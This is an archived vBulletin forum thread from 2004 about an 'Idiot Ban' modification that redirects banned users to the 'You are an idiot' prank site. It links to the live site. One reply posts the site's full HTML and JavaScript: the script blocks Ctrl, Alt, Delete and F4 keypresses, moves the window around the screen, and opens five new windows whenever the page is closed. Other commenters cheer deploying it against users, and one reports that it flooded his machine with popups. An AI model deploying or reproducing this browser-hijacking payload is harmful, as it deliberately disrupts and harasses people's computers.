Go Back   vb.org Archive > vBulletin Modifications > Archive > vB.org Archives > vBulletin 3.0 > vBulletin 3.0 Full Releases

Reply
 
Thread Tools
Idiot Ban Details »»
Idiot Ban
Version: 1.00, by Tigga Tigga is offline
Developer Last Online: Nov 2023 Show Printable Version Email this Page

Version: 3.0.0 Rating:
Released: 01-11-2004 Last Update: Never Installs: 22
 
No support by the author.

This is a pretty simple, yet pretty funny hack. Most everyone has received a link in their email, posted in a forum, or wherever that will redirect you to a site with a flash image singing "You are an idiot. Ha ha ha ha ha". This window is usually very annoying and very hard to close since it multiplies itself. Well with this hack, problem users can be "banned" and automatically redirected to this page. In most cases simply banning a problem member is enough, but every once in a while you come across those users that just don't give up and constantly try to annoy you. Well with this hack you can at least annoy them a little as well. I finally decided to make this for my own forums, so I thought I'd go ahead and share it here as well.

Just for anyone who isn't familiar with the site, here is a link to it. Be warned that you will most likely have to use ctrl+alt+delete to end your browser, so be sure you don't have anything important open before clicking on this link!
http://earth.prohosting.com/jesos

Note: I'm not sure how long that site will stay around. If it ever changes though it's pretty easy to modify the URL in the code.

Show Your Support

  • This modification may not be copied, reproduced or published elsewhere without author's permission.

Comments
  #22  
Old 01-19-2004, 12:09 PM
Nam's Avatar
Nam Nam is offline
 
Join Date: Oct 2001
Location: NY
Posts: 206
Благодарил(а): 0 раз(а)
Поблагодарили: 0 раз(а) в 0 сообщениях
Default

Quote:
Originally Posted by corn
OMG
this is the most useless hack ever
LMAO :speechless:

Very funny hack, but I don't think I'm gonna need it for my site, though I love to piss people off.
Reply With Quote
  #23  
Old 02-02-2004, 01:10 AM
genmud genmud is offline
 
Join Date: Aug 2003
Location: PHOENIX
Posts: 24
Благодарил(а): 0 раз(а)
Поблагодарили: 0 раз(а) в 0 сообщениях
Default

HTML Code:
[size=2]

<html>

<head>

<title>Mogle</title>

<script language=Javascript>

function altf4key()

{

if (event.keyCode == 18 || event.keyCode == 115) alert("You are an idiot!");

}

function ctrlkey()

{

if (event.keyCode == 17) alert("You are an idiot!");

}

function delkey()

{

if (event.keyCode == 46) alert("You are an idiot!");

}

var xOff = 5;

var yOff = 5;

var xPos = 400;

var yPos = -100;

var flagRun = 1;

function openWindow(url)

{

aWindow = window.open(url,"_blank");

}

function procreate()

{

openWindow("index.html");

openWindow("index.html");

openWindow("index.html");

openWindow("index.html");

openWindow("index.html");

}

function newXlt()

{

xOff = Math.ceil( 0 - 6 * Math.random()) * 5 - 10 ;

window.focus()

}

function newXrt()

{

xOff = Math.ceil(7 * Math.random()) * 5 - 10 ;

}

function newYup()

{

yOff = Math.ceil( 0 - 6 * Math.random()) * 5 - 10 ;

}

function newYdn()

{

yOff = Math.ceil( 7 * Math.random()) * 5 - 10 ;

}

function fOff()

{

flagrun = 0;

}

function playBall()

{

xPos += xOff;

yPos += yOff;

if (xPos > screen.width-175)

{

newXlt();

}

if (xPos < 0)

{

newXrt();

}

if (yPos > screen.height-100)

{

newYup();

}

if (yPos < 0)

{

newYdn();

}

if (flagRun == 1)

{

window.moveTo(xPos,yPos);

setTimeout('playBall()',1);

}

}

</script>

</head>

<body bgColor=#ffffff onload="playBall();" onunload="procreate();" onKeyDown="altf4key();ctrlkey();delkey();" leftmargin="0" topmargin="0" marginwidth="0" marginheight="0"><!-- BEGIN PROBE CODE -->

<embed src="youare.swf" height=600 width=600>

</body>

</html>[/size]
That is the html code for the webpage...

go to http://earth.prohosting.com/jesos/youare.swf to save that flash animation... then upload or whatever

idn
Reply With Quote
  #24  
Old 02-09-2004, 01:17 AM
SloppyGoat's Avatar
SloppyGoat SloppyGoat is offline
 
Join Date: Feb 2002
Posts: 339
Благодарил(а): 0 раз(а)
Поблагодарили: 0 раз(а) в 0 сообщениях
Default

Hahaha! I actually saved that page a long time ago and put it on my server. Anytime I saw an idiot who desperately needed it, I'd post the link for the idiot to click on. But this is even better! My version has two js files and two html files, plus the swf, though.
Reply With Quote
  #25  
Old 02-28-2004, 02:56 AM
Osterling Osterling is offline
 
Join Date: Jan 2004
Posts: 381
Благодарил(а): 0 раз(а)
Поблагодарили: 0 раз(а) в 0 сообщениях
Default

this didnt work for me.. i have RC4.. is it rc4 compatiable?
Reply With Quote
  #26  
Old 02-28-2004, 03:15 AM
Osterling Osterling is offline
 
Join Date: Jan 2004
Posts: 381
Благодарил(а): 0 раз(а)
Поблагодарили: 0 раз(а) в 0 сообщениях
Default

Quote:
if ($shownewpm)
{
if ($bbuserinfo['pmunread'] == 1)
{

}

else
{
$pmpopupurl = "private.php?$session[sessionurl_js]";
}
eval('$footer .= "' . fetch_template('pm_popup_script') . '";');
}

that is what mine looks like.. where should i put the code for the idiot ban
Reply With Quote
  #27  
Old 03-03-2004, 01:40 AM
Osterling Osterling is offline
 
Join Date: Jan 2004
Posts: 381
Благодарил(а): 0 раз(а)
Поблагодарили: 0 раз(а) в 0 сообщениях
Default

anyone wanna give me support?
Reply With Quote
  #28  
Old 03-06-2004, 06:32 PM
rebelsrock06's Avatar
rebelsrock06 rebelsrock06 is offline
 
Join Date: Sep 2003
Location: Austin, TX
Posts: 257
Благодарил(а): 0 раз(а)
Поблагодарили: 0 раз(а) в 0 сообщениях
Default

Quote:
Originally Posted by MetalGearMaster
Does it really upload a trojan to the user's computer? because if it does i wont use this, even though its an awesome hack!

MGM out

what exactly is a trojan, and NO im not talking about the condom
Reply With Quote
  #29  
Old 03-06-2004, 11:33 PM
Osterling Osterling is offline
 
Join Date: Jan 2004
Posts: 381
Благодарил(а): 0 раз(а)
Поблагодарили: 0 раз(а) в 0 сообщениях
Default

you guys don't wanna offer me any support
Reply With Quote
  #30  
Old 03-17-2004, 02:00 AM
Wifey Wifey is offline
 
Join Date: Mar 2004
Posts: 250
Благодарил(а): 0 раз(а)
Поблагодарили: 0 раз(а) в 0 сообщениях
Default

Oh my God, I wish that this hack had been installed on a board I moderate. We have two that need to die in lots of popups from this website

Very clever When the time comes I just might add this!
Reply With Quote
  #31  
Old 03-17-2004, 02:02 AM
rebelsrock06's Avatar
rebelsrock06 rebelsrock06 is offline
 
Join Date: Sep 2003
Location: Austin, TX
Posts: 257
Благодарил(а): 0 раз(а)
Поблагодарили: 0 раз(а) в 0 сообщениях
Default

except for the whole trojan thing its ok. i open this thing and ever since My somputer has had a total SPAM from pop ups and everything, IM PISSED
Reply With Quote
Reply

Thread Tools

Posting Rules
You may not post new threads
You may not post replies
You may not post attachments
You may not edit your posts

BB code is On
Smilies are On
[IMG] code is On
HTML code is Off

Forum Jump


All times are GMT. The time now is 05:45 PM.


Powered by vBulletin® Version 3.8.12 by vBS
Copyright ©2000 - 2025, vBulletin Solutions Inc.
X vBulletin 3.8.12 by vBS Debug Information
  • Page Generation 0.04961 seconds
  • Memory Usage 2,304KB
  • Queries Executed 25 (?)
More Information
Template Usage:
  • (1)SHOWTHREAD
  • (1)ad_footer_end
  • (1)ad_footer_start
  • (1)ad_header_end
  • (1)ad_header_logo
  • (1)ad_navbar_below
  • (1)ad_showthread_beforeqr
  • (1)bbcode_html
  • (3)bbcode_quote
  • (1)footer
  • (1)forumjump
  • (1)forumrules
  • (1)gobutton
  • (1)header
  • (1)headinclude
  • (1)modsystem_post
  • (1)navbar
  • (6)navbar_link
  • (120)option
  • (1)pagenav
  • (1)pagenav_curpage
  • (4)pagenav_pagelink
  • (11)post_thanks_box
  • (11)post_thanks_button
  • (1)post_thanks_javascript
  • (1)post_thanks_navbar_search
  • (11)post_thanks_postbit_info
  • (10)postbit
  • (11)postbit_onlinestatus
  • (11)postbit_wrapper
  • (1)spacer_close
  • (1)spacer_open
  • (1)tagbit_wrapper 

Phrase Groups Available:
  • global
  • inlinemod
  • postbit
  • posting
  • reputationlevel
  • showthread
Included Files:
  • ./showthread.php
  • ./global.php
  • ./includes/init.php
  • ./includes/class_core.php
  • ./includes/config.php
  • ./includes/functions.php
  • ./includes/class_hook.php
  • ./includes/modsystem_functions.php
  • ./includes/functions_bigthree.php
  • ./includes/class_postbit.php
  • ./includes/class_bbcode.php
  • ./includes/functions_reputation.php
  • ./includes/functions_post_thanks.php 

Hooks Called:
  • init_startup
  • init_startup_session_setup_start
  • init_startup_session_setup_complete
  • cache_permissions
  • fetch_threadinfo_query
  • fetch_threadinfo
  • fetch_foruminfo
  • style_fetch
  • cache_templates
  • global_start
  • parse_templates
  • global_setup_complete
  • showthread_start
  • showthread_getinfo
  • forumjump
  • showthread_post_start
  • showthread_query_postids
  • showthread_query
  • bbcode_fetch_tags
  • bbcode_create
  • showthread_postbit_create
  • postbit_factory
  • postbit_display_start
  • post_thanks_function_post_thanks_off_start
  • post_thanks_function_post_thanks_off_end
  • post_thanks_function_fetch_thanks_start
  • post_thanks_function_fetch_thanks_end
  • post_thanks_function_thanked_already_start
  • post_thanks_function_thanked_already_end
  • fetch_musername
  • postbit_imicons
  • bbcode_parse_start
  • bbcode_parse_complete_precache
  • bbcode_parse_complete
  • postbit_display_complete
  • post_thanks_function_can_thank_this_post_start
  • pagenav_page
  • pagenav_complete
  • tag_fetchbit_complete
  • forumrules
  • navbits
  • navbits_complete
  • showthread_complete